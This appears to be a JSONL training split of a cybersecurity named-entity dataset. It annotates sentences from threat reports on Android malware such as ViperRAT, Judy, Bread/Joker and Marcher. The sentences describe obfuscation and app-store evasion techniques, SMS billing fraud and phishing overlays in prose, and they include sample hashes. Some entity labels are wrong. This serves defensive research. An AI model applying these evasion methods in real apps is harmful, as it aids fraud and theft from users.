{"text": "Lookout has determined ViperRAT is a very sophisticated threat that adds to the mounting evidence that targeted mobile attacks against governments and business is a real problem .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: ViperRAT": [[23, 31]]}, "info": {"id": "cyner_train_001566", "source": "cyner_train"}}
{"text": "Given that this is an active threat , we ’ ve been working behind-the-scenes with our customers to ensure both personal and enterprise customers are protected from this threat and only decided to come forward with this information after the research team at Kaspersky released a report earlier today .", "spans": {"ORGANIZATION: Kaspersky": [[258, 267]]}, "info": {"id": "cyner_train_001568", "source": "cyner_train"}}
{"text": "Additionally , we have determined that though original reports of this story attribute this surveillanceware tool to Hamas , this may not be the case , as we demonstrate below .", "spans": {"ORGANIZATION: Hamas": [[117, 122]]}, "info": {"id": "cyner_train_001569", "source": "cyner_train"}}
{"text": "The increasing sophistication of surveillanceware The structure of the surveillanceware indicates it is very sophisticated .", "spans": {}, "info": {"id": "cyner_train_001570", "source": "cyner_train"}}
{"text": "Analysis indicates there are currently two distinct variants of ViperRAT .", "spans": {"MALWARE: ViperRAT": [[64, 72]]}, "info": {"id": "cyner_train_001571", "source": "cyner_train"}}
{"text": "The first variant involves social engineering the target into downloading a trojanized app .", "spans": {}, "info": {"id": "cyner_train_001573", "source": "cyner_train"}}
{"text": "After building an initial rapport with targets , the actors behind these social media accounts would instruct victims to install an additional app for easier communication .", "spans": {}, "info": {"id": "cyner_train_001575", "source": "cyner_train"}}
{"text": "We also uncovered ViperRAT in a billiards game , an Israeli Love Songs player , and a Move To iOS app .", "spans": {"MALWARE: ViperRAT": [[18, 26]], "SYSTEM: iOS": [[94, 97]]}, "info": {"id": "cyner_train_001577", "source": "cyner_train"}}
{"text": "The second stage The second stage apps contain the surveillanceware capabilities .", "spans": {}, "info": {"id": "cyner_train_001578", "source": "cyner_train"}}
{"text": "Lookout uncovered nine secondary payload applications : * These apps have not been previously reported and were discovered using data from the Lookout global sensor network , which collects app and device information from over 100 million sensors to provide researchers and customers with a holistic look at the mobile threat ecosystem today .", "spans": {"ORGANIZATION: Lookout": [[0, 7], [143, 150]]}, "info": {"id": "cyner_train_001579", "source": "cyner_train"}}
{"text": "Naming additional payload applications as system updates is a clever technique used by malware authors to trick victims into believing a threat isn ’ t present on their device .", "spans": {}, "info": {"id": "cyner_train_001580", "source": "cyner_train"}}
{"text": "For example , if a victim has Viber on their device , it will choose to retrieve the Viber Update second stage .", "spans": {"SYSTEM: Viber": [[30, 35]], "SYSTEM: Viber Update": [[85, 97]]}, "info": {"id": "cyner_train_001582", "source": "cyner_train"}}
{"text": "What was taken The actors behind ViperRAT seem to be particularly interested in image data .", "spans": {"MALWARE: ViperRAT": [[33, 41]]}, "info": {"id": "cyner_train_001584", "source": "cyner_train"}}
{"text": "We were able to identify that 8,929 files had been exfiltrated from compromised devices and that the overwhelming majority of these , 97 percent , were highly likely encrypted images taken using the device camera .", "spans": {}, "info": {"id": "cyner_train_001585", "source": "cyner_train"}}
{"text": "We observed legitimate exfiltrated files of the following types of data : Contact information Compressed recorded audio in the Adaptive Multi-Rate ( amr ) file format Images captured from the device camera Images stored on both internal device and SDCard storage that are listed in the MediaStore Device geolocation information SMS content Chrome browser search history and bookmarks Call log information Cell tower information Device network metadata ; such as phone number , device software version , network country , network operator , SIM country , SIM operator , SIM serial , IMSI , voice mail number , phone", "spans": {}, "info": {"id": "cyner_train_001588", "source": "cyner_train"}}
{"text": "type , network type , data state , data activity , call state , SIM state , whether device is roaming , and if SMS is supported .", "spans": {}, "info": {"id": "cyner_train_001589", "source": "cyner_train"}}
{"text": "Standard browser search history Standard browser bookmarks Device handset metadata ; such as brand , display , hardware , manufacturer , product , serial , radio version , and SDK .", "spans": {}, "info": {"id": "cyner_train_001590", "source": "cyner_train"}}
{"text": "Below is a collection of API methods and a brief description around their purpose .", "spans": {}, "info": {"id": "cyner_train_001592", "source": "cyner_train"}}
{"text": "Israeli media published the first reports about the social networking and social engineering aspects of this campaign .", "spans": {}, "info": {"id": "cyner_train_001594", "source": "cyner_train"}}
{"text": "However it ’ s unclear whether organizations that later reported on ViperRAT performed their own independent research or simply based their content on the original Israeli report .", "spans": {"MALWARE: ViperRAT": [[68, 76]]}, "info": {"id": "cyner_train_001595", "source": "cyner_train"}}
{"text": "ViperRAT has been operational for quite some time , with what appears to be a test application that surfaced in late 2015 .", "spans": {"MALWARE: ViperRAT": [[0, 8]]}, "info": {"id": "cyner_train_001597", "source": "cyner_train"}}
{"text": "Many of the default strings in this application are in Arabic , including the name .", "spans": {}, "info": {"id": "cyner_train_001598", "source": "cyner_train"}}
{"text": "This leads us to believe this is another actor .", "spans": {}, "info": {"id": "cyner_train_001600", "source": "cyner_train"}}
{"text": "However , the existence of threats like ViperRAT and Pegasus , the most sophisticated piece of mobile surveillanceware we ’ ve seen to date , are evidence that attackers are targeting mobile devices .", "spans": {"MALWARE: ViperRAT": [[40, 48]], "MALWARE: Pegasus": [[53, 60]]}, "info": {"id": "cyner_train_001602", "source": "cyner_train"}}
{"text": "Enterprise and government employees all use these devices in their day-to-day work , which means IT and security leaders within these organizations must prioritize mobile in their security strategies .", "spans": {}, "info": {"id": "cyner_train_001604", "source": "cyner_train"}}
{"text": "Check Point researchers discovered another widespread malware campaign on Google Play , Google ’ s official app store .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "SYSTEM: Google Play": [[74, 85]], "ORGANIZATION: Google": [[88, 94]]}, "info": {"id": "cyner_train_001605", "source": "cyner_train"}}
{"text": "The malware uses infected devices to generate large amounts of fraudulent clicks on advertisements , generating revenues for the perpetrators behind it .", "spans": {}, "info": {"id": "cyner_train_001607", "source": "cyner_train"}}
{"text": "The malicious apps reached an astonishing spread between 4.5 million and 18.5 million downloads .", "spans": {}, "info": {"id": "cyner_train_001608", "source": "cyner_train"}}
{"text": "Some of the apps we discovered resided on Google Play for several years , but all were recently updated .", "spans": {"SYSTEM: Google Play": [[42, 53]]}, "info": {"id": "cyner_train_001609", "source": "cyner_train"}}
{"text": "It is unclear how long the malicious code existed inside the apps , hence the actual spread of the malware remains unknown .", "spans": {}, "info": {"id": "cyner_train_001610", "source": "cyner_train"}}
{"text": "We also found several apps containing the malware , which were developed by other developers on Google Play .", "spans": {"SYSTEM: Google Play": [[96, 107]]}, "info": {"id": "cyner_train_001611", "source": "cyner_train"}}
{"text": "The connection between the two campaigns remains unclear , and it is possible that one borrowed code from the other , knowingly or unknowingly .", "spans": {}, "info": {"id": "cyner_train_001612", "source": "cyner_train"}}
{"text": "Similar to previous malware which infiltrated Google Play , such as FalseGuide and Skinner , Judy relies on the communication with its Command and Control server ( C & C ) for its operation .", "spans": {"SYSTEM: Google Play": [[46, 57]], "MALWARE: FalseGuide": [[68, 78]], "MALWARE: Skinner": [[83, 90]]}, "info": {"id": "cyner_train_001615", "source": "cyner_train"}}
{"text": "The server replies with the actual malicious payload , which includes JavaScript code , a user-agent string and URLs controlled by the malware author .", "spans": {}, "info": {"id": "cyner_train_001619", "source": "cyner_train"}}
{"text": "The malware opens the URLs using the user agent that imitates a PC browser in a hidden webpage and receives a redirection to another website .", "spans": {}, "info": {"id": "cyner_train_001620", "source": "cyner_train"}}
{"text": "Upon clicking the ads , the malware author receives payment from the website developer , which pays for the illegitimate clicks and traffic .", "spans": {}, "info": {"id": "cyner_train_001622", "source": "cyner_train"}}
{"text": "The JavaScript code locates the targeted ads by searching for iframes which contain ads from Google ads infrastructure , as shown in the image below : The fraudulent clicks generate a large revenue for the perpetrators , especially since the malware reached a presumably wide spread .", "spans": {"SYSTEM: Google ads": [[93, 103]]}, "info": {"id": "cyner_train_001623", "source": "cyner_train"}}
{"text": "Who is behind Judy ?", "spans": {"MALWARE: Judy": [[14, 18]]}, "info": {"id": "cyner_train_001624", "source": "cyner_train"}}
{"text": "The malicious apps are all developed by a Korean company named Kiniwini , registered on Google Play as ENISTUDIO corp .", "spans": {"ORGANIZATION: Kiniwini": [[63, 71]], "SYSTEM: Google Play": [[88, 99]], "ORGANIZATION: ENISTUDIO corp": [[103, 117]]}, "info": {"id": "cyner_train_001625", "source": "cyner_train"}}
{"text": "The company develops mobile apps for both Android and iOS platforms .", "spans": {"SYSTEM: Android": [[42, 49]], "SYSTEM: iOS": [[54, 57]]}, "info": {"id": "cyner_train_001626", "source": "cyner_train"}}
{"text": "It is quite unusual to find an actual organization behind mobile malware , as most of them are developed by purely malicious actors .", "spans": {}, "info": {"id": "cyner_train_001627", "source": "cyner_train"}}
{"text": "It is important to note that the activity conducted by the malware is not borderline advertising , but definitely an illegitimate use of the users ’ mobile devices for generating fraudulent clicks , benefiting the attackers .", "spans": {}, "info": {"id": "cyner_train_001628", "source": "cyner_train"}}
{"text": "Although most apps have positive ratings , some of the users have noticed and reported Judy ’ s suspicious activities , as seen in the images below : As seen in previous malware , such as DressCode , a high reputation does not necessarily indicate that the app is safe for use .", "spans": {"MALWARE: Judy": [[87, 91]], "MALWARE: DressCode": [[188, 197]]}, "info": {"id": "cyner_train_001630", "source": "cyner_train"}}
{"text": "Hackers can hide their apps ’ real intentions or even manipulate users into leaving positive ratings , in some cases unknowingly .", "spans": {}, "info": {"id": "cyner_train_001631", "source": "cyner_train"}}
{"text": "Users can not rely on the official app stores for their safety , and should implement advanced security protections capable of detecting and blocking zero-day mobile malware .", "spans": {}, "info": {"id": "cyner_train_001632", "source": "cyner_train"}}
{"text": "We first started tracking Bread ( also known as Joker ) in early 2017 , identifying apps designed solely for SMS fraud .", "spans": {"MALWARE: Bread": [[26, 31]], "MALWARE: Joker": [[48, 53]]}, "info": {"id": "cyner_train_001634", "source": "cyner_train"}}
{"text": "As the Play Store has introduced new policies and Google Play Protect has scaled defenses , Bread apps were forced to continually iterate to search for gaps .", "spans": {"SYSTEM: Play Store": [[7, 17]], "SYSTEM: Google Play Protect": [[50, 69]], "MALWARE: Bread": [[92, 97]]}, "info": {"id": "cyner_train_001635", "source": "cyner_train"}}
{"text": "Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere .", "spans": {"SYSTEM: Play Store": [[85, 95]]}, "info": {"id": "cyner_train_001637", "source": "cyner_train"}}
{"text": "In this post , we show how Google Play Protect has defended against a well organized , persistent attacker and share examples of their techniques .", "spans": {"SYSTEM: Google Play Protect": [[27, 46]]}, "info": {"id": "cyner_train_001638", "source": "cyner_train"}}
{"text": "Both of these types of fraud take advantage of mobile billing techniques involving the user ’ s carrier .", "spans": {}, "info": {"id": "cyner_train_001640", "source": "cyner_train"}}
{"text": "SMS Billing Carriers may partner with vendors to allow users to pay for services by SMS .", "spans": {}, "info": {"id": "cyner_train_001641", "source": "cyner_train"}}
{"text": "A charge is then added to the user ’ s bill with their mobile service provider .", "spans": {}, "info": {"id": "cyner_train_001643", "source": "cyner_train"}}
{"text": "Toll Billing Carriers may also provide payment endpoints over a web page .", "spans": {}, "info": {"id": "cyner_train_001644", "source": "cyner_train"}}
{"text": "The user visits the URL to complete the payment and enters their phone number .", "spans": {}, "info": {"id": "cyner_train_001645", "source": "cyner_train"}}
{"text": "Verification that the request is coming from the user ’ s device is completed using two possible methods : The user connects to the site over mobile data , not WiFi ( so the service provider directly handles the connection and can validate the phone number ) ; or The user must retrieve a code sent to them via SMS and enter it into the web page ( thereby proving access to the provided phone number ) .", "spans": {}, "info": {"id": "cyner_train_001646", "source": "cyner_train"}}
{"text": "Fraud Both of the billing methods detailed above provide device verification , but not user verification .", "spans": {}, "info": {"id": "cyner_train_001647", "source": "cyner_train"}}
{"text": "The carrier can determine that the request originates from the user ’ s device , but does not require any interaction from the user that can not be automated .", "spans": {}, "info": {"id": "cyner_train_001648", "source": "cyner_train"}}
{"text": "Here are some highlights .", "spans": {}, "info": {"id": "cyner_train_001651", "source": "cyner_train"}}
{"text": "Standard Encryption Frequently , Bread apps take advantage of standard crypto libraries in ` java.util.crypto ` .", "spans": {}, "info": {"id": "cyner_train_001652", "source": "cyner_train"}}
{"text": "We have discovered apps using AES , Blowfish , and DES as well as combinations of these to encrypt their strings .", "spans": {}, "info": {"id": "cyner_train_001653", "source": "cyner_train"}}
{"text": "Custom Encryption Other variants have used custom-implemented encryption algorithms .", "spans": {}, "info": {"id": "cyner_train_001654", "source": "cyner_train"}}
{"text": "Some common techniques include : basic XOR encryption , nested XOR and custom key-derivation methods .", "spans": {}, "info": {"id": "cyner_train_001655", "source": "cyner_train"}}
{"text": "Split Strings Encrypted strings can be a signal that the code is trying to hide something .", "spans": {}, "info": {"id": "cyner_train_001657", "source": "cyner_train"}}
{"text": "Bread has used a few tricks to keep strings in plaintext while preventing basic string matching .", "spans": {"MALWARE: Bread": [[0, 5]]}, "info": {"id": "cyner_train_001658", "source": "cyner_train"}}
{"text": "Going one step further , these substrings are sometimes scattered throughout the code , retrieved from static variables and method calls .", "spans": {}, "info": {"id": "cyner_train_001659", "source": "cyner_train"}}
{"text": "“ .clic ” and “ k ( ) ; ” ) .", "spans": {}, "info": {"id": "cyner_train_001661", "source": "cyner_train"}}
{"text": "Delimiters Another technique to obfuscate unencrypted strings uses repeated delimiters .", "spans": {}, "info": {"id": "cyner_train_001662", "source": "cyner_train"}}
{"text": "A short , constant string of characters is inserted at strategic points to break up keywords : At runtime , the delimiter is removed before using the string : API OBFUSCATION SMS and toll fraud generally requires a few basic behaviors ( for example , disabling WiFi or accessing SMS ) , which are accessible by a handful of APIs .", "spans": {}, "info": {"id": "cyner_train_001663", "source": "cyner_train"}}
{"text": "Reflection Most methods for hiding API usage tend to use Java reflection in some way .", "spans": {}, "info": {"id": "cyner_train_001665", "source": "cyner_train"}}
{"text": "In some samples , Bread has simply directly called the Reflect API on strings decrypted at runtime .", "spans": {"MALWARE: Bread": [[18, 23]]}, "info": {"id": "cyner_train_001666", "source": "cyner_train"}}
{"text": "In the native library , it stores the strings to access the SMS API .", "spans": {}, "info": {"id": "cyner_train_001670", "source": "cyner_train"}}
{"text": "The nativesend method uses the Java Native Interface ( JNI ) to fetch and call the Android SMS API .", "spans": {"SYSTEM: Android": [[83, 90]]}, "info": {"id": "cyner_train_001671", "source": "cyner_train"}}
{"text": "WebView JavaScript Interface Continuing on the theme of cross-language bridges , Bread has also tried out some obfuscation methods utilizing JavaScript in WebViews .", "spans": {"MALWARE: Bread": [[81, 86]]}, "info": {"id": "cyner_train_001673", "source": "cyner_train"}}
{"text": "However , the app does create a WebView and registers a JavaScript interface to this class .", "spans": {}, "info": {"id": "cyner_train_001676", "source": "cyner_train"}}
{"text": "This gives JavaScript run in the WebView access to this method .", "spans": {}, "info": {"id": "cyner_train_001677", "source": "cyner_train"}}
{"text": "The app loads a URL pointing to a Bread-controlled server .", "spans": {}, "info": {"id": "cyner_train_001678", "source": "cyner_train"}}
{"text": "The response contains some basic HTML and JavaScript .", "spans": {}, "info": {"id": "cyner_train_001679", "source": "cyner_train"}}
{"text": "In green , we can see the references to the SMS API .", "spans": {}, "info": {"id": "cyner_train_001680", "source": "cyner_train"}}
{"text": "PACKING In addition to implementing custom obfuscation techniques , apps have used several commercially available packers including : Qihoo360 , AliProtect and SecShell .", "spans": {"SYSTEM: Qihoo360": [[134, 142]], "SYSTEM: AliProtect": [[145, 155]], "SYSTEM: SecShell": [[160, 168]]}, "info": {"id": "cyner_train_001683", "source": "cyner_train"}}
{"text": "The figure below shows a fragment of encrypted JAR stored in .rodata section of a shared object shipped with the APK as well as the XOR key used for decryption .", "spans": {}, "info": {"id": "cyner_train_001686", "source": "cyner_train"}}
{"text": "After we blocked those samples , they moved a significant portion of malicious functionality into the native library , which resulted in a rather peculiar back and forth between Dalvik and native code : COMMAND & CONTROL Dynamic Shortcodes & Content Early versions of Bread utilized a basic command and control infrastructure to dynamically deliver content and retrieve billing details .", "spans": {}, "info": {"id": "cyner_train_001687", "source": "cyner_train"}}
{"text": "In the example server response below , the green fields show text to be shown to the user .", "spans": {}, "info": {"id": "cyner_train_001688", "source": "cyner_train"}}
{"text": "The red fields are used as the shortcode and keyword for SMS billing .", "spans": {}, "info": {"id": "cyner_train_001689", "source": "cyner_train"}}
{"text": "At runtime , the apps can check which carrier the device is connected to and fetch a configuration object from the command and control server .", "spans": {}, "info": {"id": "cyner_train_001691", "source": "cyner_train"}}
{"text": "The steps implemented include : Load a URL in a WebView Run JavaScript in WebView Toggle WiFi state Toggle mobile data state Read/modify SMS inbox Solve captchas Captchas One of the more interesting states implements the ability to solve basic captchas ( obscured letters and numbers ) .", "spans": {}, "info": {"id": "cyner_train_001693", "source": "cyner_train"}}
{"text": "First , the app creates a JavaScript function to call a Java method , getImageBase64 , exposed to WebView using addJavascriptInterface .", "spans": {}, "info": {"id": "cyner_train_001694", "source": "cyner_train"}}
{"text": "The value used to replace GET_IMG_OBJECT comes from the JSON configuration .", "spans": {}, "info": {"id": "cyner_train_001695", "source": "cyner_train"}}
{"text": "The app then uses JavaScript injection to create a new script in the carrier ’ s web page to run the new function .", "spans": {}, "info": {"id": "cyner_train_001696", "source": "cyner_train"}}
{"text": "The base64-encoded image is then uploaded to an image recognition service .", "spans": {}, "info": {"id": "cyner_train_001697", "source": "cyner_train"}}
{"text": "If the text is retrieved successfully , the app uses JavaScript injection again to submit the HTML form with the captcha answer .", "spans": {}, "info": {"id": "cyner_train_001698", "source": "cyner_train"}}
{"text": "The app checks if the device ’ s network matches one of those provided by the server .", "spans": {}, "info": {"id": "cyner_train_001702", "source": "cyner_train"}}
{"text": "Server-side Carrier Checks In the JavaScript bridge API obfuscation example covered above , the server supplied the app with the necessary strings to complete the billing process .", "spans": {}, "info": {"id": "cyner_train_001706", "source": "cyner_train"}}
{"text": "However , analysts may not always see the indicators of compromise in the server ’ s response .", "spans": {}, "info": {"id": "cyner_train_001707", "source": "cyner_train"}}
{"text": "In this example , the requests to the server take the following form : Here , the “ operator ” query parameter is the Mobile Country Code and Mobile Network Code .", "spans": {}, "info": {"id": "cyner_train_001708", "source": "cyner_train"}}
{"text": "The server can use this information to determine if the user ’ s carrier is one of Bread ’ s targets .", "spans": {"MALWARE: Bread": [[83, 88]]}, "info": {"id": "cyner_train_001709", "source": "cyner_train"}}
{"text": "If not , the response is scrubbed of the strings used to complete the billing fraud .", "spans": {}, "info": {"id": "cyner_train_001710", "source": "cyner_train"}}
{"text": "MISLEADING USERS Bread apps sometimes display a pop-up to the user that implies some form of compliance or disclosure , showing terms and conditions or a confirm button .", "spans": {"MALWARE: Bread": [[17, 22]]}, "info": {"id": "cyner_train_001711", "source": "cyner_train"}}
{"text": "Other versions included all the pieces needed for a valid disclosure message .", "spans": {}, "info": {"id": "cyner_train_001713", "source": "cyner_train"}}
{"text": "Bread apps frequently contain no functionality beyond the billing process or simply clone content from other popular apps .", "spans": {"MALWARE: Bread": [[0, 5]]}, "info": {"id": "cyner_train_001715", "source": "cyner_train"}}
{"text": "VERSIONING Bread has also leveraged an abuse tactic unique to app stores : versioning .", "spans": {"MALWARE: Bread": [[11, 16]]}, "info": {"id": "cyner_train_001716", "source": "cyner_train"}}
{"text": "Some apps have started with clean versions , in an attempt to grow user bases and build the developer accounts ’ reputations .", "spans": {}, "info": {"id": "cyner_train_001717", "source": "cyner_train"}}
{"text": "Some are first uploaded with all the necessary code except the one line that actually initializes the billing process .", "spans": {}, "info": {"id": "cyner_train_001720", "source": "cyner_train"}}
{"text": "Others may have the necessary permissions , but are missing the classes containing the fraud code .", "spans": {}, "info": {"id": "cyner_train_001721", "source": "cyner_train"}}
{"text": "FAKE REVIEWS When early versions of apps are first published , many five star reviews appear with comments like : “ So .. good .. ” “ very beautiful ” Later , 1 star reviews from real users start appearing with comments like : “ Deception ” “ The app is not honest … ” SUMMARY Sheer volume appears to be the preferred approach for Bread developers .", "spans": {"MALWARE: Bread": [[331, 336]]}, "info": {"id": "cyner_train_001725", "source": "cyner_train"}}
{"text": "At different times , we have seen three or more active variants using different approaches or targeting different carriers .", "spans": {}, "info": {"id": "cyner_train_001726", "source": "cyner_train"}}
{"text": "Within each variant , the malicious code present in each sample may look nearly identical with only one evasion technique changed .", "spans": {}, "info": {"id": "cyner_train_001727", "source": "cyner_train"}}
{"text": "Sample 1 may use AES-encrypted strings with reflection , while Sample 2 ( submitted on the same day ) will use the same code but with plaintext strings .", "spans": {"ORGANIZATION: AES-encrypted": [[17, 30]]}, "info": {"id": "cyner_train_001728", "source": "cyner_train"}}
{"text": "This family showcases the amount of resources that malware authors now have to expend .", "spans": {}, "info": {"id": "cyner_train_001731", "source": "cyner_train"}}
{"text": "SELECTED SAMPLES Package Name SHA-256 Digest com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09", "spans": {}, "info": {"id": "cyner_train_001733", "source": "cyner_train"}}
{"text": "com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131", "spans": {}, "info": {"id": "cyner_train_001734", "source": "cyner_train"}}
{"text": "com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b Exobot ( Marcher ) - Android banking Trojan on the rise February 2017 Introduction The past months many different banking Trojans for", "spans": {"MALWARE: Exobot": [[158, 164]], "MALWARE: Marcher": [[167, 174]], "SYSTEM: Android": [[179, 186]]}, "info": {"id": "cyner_train_001735", "source": "cyner_train"}}
{"text": "the Android platform have received media attention .", "spans": {"SYSTEM: Android": [[4, 11]]}, "info": {"id": "cyner_train_001736", "source": "cyner_train"}}
{"text": "One of these , called Marcher ( aka Exobot ) , seems to be especially active with different samples appearing on a daily basis .", "spans": {"MALWARE: Marcher": [[22, 29]], "MALWARE: Exobot": [[36, 42]]}, "info": {"id": "cyner_train_001737", "source": "cyner_train"}}
{"text": "This malware variant also appears to be technically superior to many other banking Trojans being able to use its overlay attack even on Android 6 , which has technical improvements compared to the previous Android versions to prevent such attacks .", "spans": {"SYSTEM: Android 6": [[136, 145]], "SYSTEM: Android": [[206, 213]]}, "info": {"id": "cyner_train_001738", "source": "cyner_train"}}
{"text": "The main infection vector is a phishing attack using SMS/MMS .", "spans": {}, "info": {"id": "cyner_train_001739", "source": "cyner_train"}}
{"text": "On installation , the app requests the user to provide SMS storage access and high Android privileges such as Device Admin .", "spans": {"SYSTEM: Android": [[83, 90]]}, "info": {"id": "cyner_train_001741", "source": "cyner_train"}}
{"text": "Other infection vectors include pornographic websites serving apps called Adobe Flash or YouPorn .", "spans": {"SYSTEM: Adobe Flash": [[74, 85]], "SYSTEM: YouPorn": [[89, 96]]}, "info": {"id": "cyner_train_001742", "source": "cyner_train"}}
{"text": "The first attack vector is to compromise the out of band authentication for online banks that rely on SMS using SMS forwarding .", "spans": {}, "info": {"id": "cyner_train_001744", "source": "cyner_train"}}
{"text": "The second attack vector , the overlay attack , shows a customized phishing window whenever a targeted application is started on the device .", "spans": {}, "info": {"id": "cyner_train_001745", "source": "cyner_train"}}
{"text": "The overlay window is often indistinguishable from the expected screen ( such as a login screen for a banking app ) and is used to steal the victim ’ s banking credentials .", "spans": {}, "info": {"id": "cyner_train_001746", "source": "cyner_train"}}
{"text": "The target list and bank specific fake login pages can be dynamically updated via their C2 panel ( dashboard back-end ) which significantly increases the adaptability and scalability of this attack .", "spans": {}, "info": {"id": "cyner_train_001747", "source": "cyner_train"}}
{"text": "In addition , this type of Android banking malware does not require the device to be rooted or the app to have any specific Android permission ( besides android.permission.INTERNET to retrieve the overlay contents and send its captured data ) .", "spans": {"SYSTEM: Android": [[27, 34], [124, 131]]}, "info": {"id": "cyner_train_001748", "source": "cyner_train"}}
{"text": "The many changes we see in the way the attacks are performed show that attackers are heavily experimenting to find the best way of infecting a mobile device and abusing existing functionality to perform successful phishing attacks .", "spans": {}, "info": {"id": "cyner_train_001749", "source": "cyner_train"}}
{"text": "The next stage in device infection could be the use of exploit kits and malvertising , which would be quite effective due the many Android vulnerabilities and consumers with unpatched devices .", "spans": {"VULNERABILITY: Android vulnerabilities": [[131, 154]], "VULNERABILITY: unpatched devices": [[174, 191]]}, "info": {"id": "cyner_train_001750", "source": "cyner_train"}}
{"text": "Technical Analysis Permissions Marcher ’ s APK size is fairly small ( only 683KB for sample eb8f02fc30ec49e4af1560e54b53d1a7 ) , much smaller than most legitimate apps and other popular mobile malware samples .", "spans": {"MALWARE: Marcher": [[31, 38]]}, "info": {"id": "cyner_train_001752", "source": "cyner_train"}}
{"text": "This sample only includes Dalvik bytecode and resources without any native libraries .", "spans": {}, "info": {"id": "cyner_train_001753", "source": "cyner_train"}}
{"text": "The package name ( vyn.hhsdzgvoexobmkygffzwuewrbikzud ) and its many activities and services have randomized names , probably to make it a bit more difficult to detect the package using blacklisting .", "spans": {}, "info": {"id": "cyner_train_001754", "source": "cyner_train"}}
{"text": "The set of permissions required by Marcher according to the manifest is as follows : ∗ android.permission.CHANGE_NETWORK_STATE ( change network connectivity state ) ∗ android.permission.SEND_SMS ( send SMS messages ) ∗ android.permission.USES_POLICY_FORCE_LOCK ( lock the device ) ∗ android.permission.RECEIVE_BOOT_COMPLETED ( start malware when device boots ) ∗ android.permission.INTERNET ( communicate with the internet ) ∗ android.permission.VIBRATE", "spans": {"MALWARE: Marcher": [[35, 42]]}, "info": {"id": "cyner_train_001755", "source": "cyner_train"}}
{"text": "( control the vibrator ) ∗ android.permission.ACCESS_WIFI_STATE ( view information about the status of Wi-Fi ) ∗ android.permission.WRITE_SMS ( edit/delete SMS ) ∗ android.permission.ACCESS_NETWORK_STATE ( view the status of all networks ) ∗ android.permission.WAKE_LOCK ( prevent the phone from going to sleep ) ∗ android.permission.GET_TASKS ( retrieve running applications ) ∗ android.permission.CALL_PHONE ( call phone numbers )", "spans": {}, "info": {"id": "cyner_train_001756", "source": "cyner_train"}}
{"text": "∗ android.permission.WRITE_SETTINGS ( read/write global system settings ) ∗ android.permission.RECEIVE_SMS ( intercept SMS messages ) ∗ android.permission.READ_PHONE_STATE ( read phone details of the device such as phone number and serial number ) ∗ android.permission.CHANGE_WIFI_STATE ( connect to and disconnect from Wi-Fi networks and make changes to configured networks ) ∗ android.permission.READ_CONTACTS ( read all contact data ) * android.permission.READ_SMS", "spans": {}, "info": {"id": "cyner_train_001757", "source": "cyner_train"}}
{"text": "( read SMS messages ) Obviously a fairly significant list of permissions of which many are suspicious , especially when combined .", "spans": {}, "info": {"id": "cyner_train_001758", "source": "cyner_train"}}
{"text": "Runtastic sample permission prompt Runtastic sample permission prompt Checking foreground app Marcher is one of the few Android banking Trojans to use the AndroidProcesses library , which enables the application to obtain the name of the Android package that is currently running in the foreground .", "spans": {"SYSTEM: Runtastic": [[0, 9], [35, 44]], "MALWARE: Marcher": [[94, 101]], "SYSTEM: Android": [[238, 245]]}, "info": {"id": "cyner_train_001759", "source": "cyner_train"}}
{"text": "This library is used because it uses the only ( publicly known ) way to retrieve this information on Android 6 ( using the process OOM score read from the /proc directory ) .", "spans": {"SYSTEM: Android 6": [[101, 110]]}, "info": {"id": "cyner_train_001760", "source": "cyner_train"}}
{"text": "When the current app on the foreground matches with an app targeted by the malware , the Trojan will show the corresponding phishing overlay , making the user think it is the app that was just started .", "spans": {}, "info": {"id": "cyner_train_001761", "source": "cyner_train"}}
{"text": "The complete list of apps can be seen below .", "spans": {}, "info": {"id": "cyner_train_001763", "source": "cyner_train"}}
{"text": "The phishing pages shown in the overlay use Ajax calls to communicate with a PHP back-end which stores all user input .", "spans": {}, "info": {"id": "cyner_train_001764", "source": "cyner_train"}}
{"text": "The C2 backend url looks like this : https : //evilhost/c2folder/njs2/ ?", "spans": {}, "info": {"id": "cyner_train_001765", "source": "cyner_train"}}
{"text": "There is no way to access the original app again even if victims terminate the overlay process and reopen app , until credit card ( name , number , expiry date , security code ) and/or bank information ( PIN , VBV passcode , date of birth , etc .", "spans": {}, "info": {"id": "cyner_train_001767", "source": "cyner_train"}}
{"text": "Agent Smith : A New Species of Mobile Malware July 10 , 2019 Check Point Researchers recently discovered a new variant of mobile malware that quietly infected around 25 million devices , while the user remains completely unaware .", "spans": {"MALWARE: Agent Smith": [[0, 11]], "ORGANIZATION: Check Point": [[61, 72]]}, "info": {"id": "cyner_train_001770", "source": "cyner_train"}}
{"text": "This activity resembles previous campaigns such as Gooligan , HummingBad and CopyCat .", "spans": {"MALWARE: Gooligan": [[51, 59]], "MALWARE: HummingBad": [[62, 72]], "MALWARE: CopyCat": [[77, 84]]}, "info": {"id": "cyner_train_001774", "source": "cyner_train"}}
{"text": "In a much-improved Android security environment , the actors behind Agent Smith seem to have moved into the more complex world of constantly searching for new loopholes , such as Janus , Bundle and Man-in-the-Disk , to achieve a 3-stage infection chain , in order to build a botnet of controlled devices to earn profit for the perpetrator .", "spans": {"SYSTEM: Android": [[19, 26]], "MALWARE: Agent Smith": [[68, 79]], "VULNERABILITY: Janus": [[179, 184]], "VULNERABILITY: Bundle": [[187, 193]], "VULNERABILITY: Man-in-the-Disk": [[198, 213]]}, "info": {"id": "cyner_train_001776", "source": "cyner_train"}}
{"text": "“ Agent Smith ” is possibly the first campaign seen that ingrates and weaponized all these loopholes and are described in detail below .", "spans": {"MALWARE: Agent Smith": [[2, 13]]}, "info": {"id": "cyner_train_001777", "source": "cyner_train"}}
